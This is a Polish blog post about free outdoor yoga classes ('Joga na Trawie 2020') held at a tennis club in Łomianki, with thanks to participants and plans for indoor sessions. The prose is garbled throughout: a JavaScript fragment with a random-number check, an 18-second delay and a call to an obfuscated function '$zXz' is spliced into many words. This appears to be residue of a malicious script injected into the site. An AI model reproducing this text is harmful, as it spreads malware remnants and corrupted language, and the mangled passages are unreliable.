Joga na Trawie 2020

Za nami kolejne ladom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to z Jogą na Trawie. Baner na ogrodzeniu klubu Frajda (Tenis Klub Frajda) przy ul. Jeziornej 1A, gdzie odbywały się zajęcia, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towarzyszył licznej grupie ćwiczących osób w wakacyjne  niedziele i zachęcał następnych „odkrywców” jogi. 


To już trzeci rok, kiedy dzięki dofinansowaniu z budżetu gminy Łomianki możemy realizować ten projekt bezpłatnych zajęć na świeżym powietrzu. Cieszy nas bardzo, że coraz więcej osób korzysta z tej okazji, rozpoczynając swoją przygodę z jogą.

Liczba osób wspólnie ćwiczących nieraz nas zaskoczyła. Czasami było dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to prawie 40 osób. Dobrze, że trawnik w klubie Frajda  jest duży. Gdy tylko pogoda dopisywała, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to frekwencja rosła. 

Wardom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zapamiętać, że ćwiczenia jogi dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to samo zdrowie. Przynoszą mnóstwo korzyści dla całego organizmu. Dodają człowiekowi energii i pomagają mu się zrelaksować. Asany, czyli specyficzne dla jogi pozycje i postawy ciała, świetnie rozluźniają ciało, wzmacniają mięśnie, poprawiają sylwetkę. Organizm jest lepiej dotleniony, a my mamy większą ochotę do życia.

Joga dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to nie tylko ćwiczenia, które zadbają o Twoją postawę ciała. To także wiele innych zalet i korzyści z jej praktykowania, które przenoszą się na codzienne życie. Dają pogodę ducha, więc podczas ćwiczeń nawet upał niestraszny, zwłaszcza gdy na terenie klubu Frajda można znaleźć kojący cień. 

Dziękujemy Wam za dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, że wspólnie tworzyliśmy ten projekt. Już dziś serdecznie zapraszamy za rok na kolejne wakacje z Jogą na Trawie.

Nadom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tomiast dla tych, którzy polubili tę formę ćwiczeń, chcemy z pomocą finansową gminy Łomianki zorganizować zajęcia pod dachem. Złożyliśmy w tej sprawie sdom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosowne dokumenty. Jeśli wszystkie formalności zostaną załatwione, joga będzie odbywać się w Domu Spotkań Sąsiedzkich w Burakowie przy ul. Parkowej 2. Bezpłatne zajęcia planujemy w poniedziałki i środy o godzinie 19.00. Zapraszamy. 

Różne fodom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}torelacje i krótkie filmiki z poszczególnych zajęć jogi znajdziecie na naszym profilu facebookowym.

Jerzy Kostowski Opublikowane przez:

Bądź pierwszą osobą, która zostawi swój komentarz

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

Afiseaza emoticoanele Locco.Ro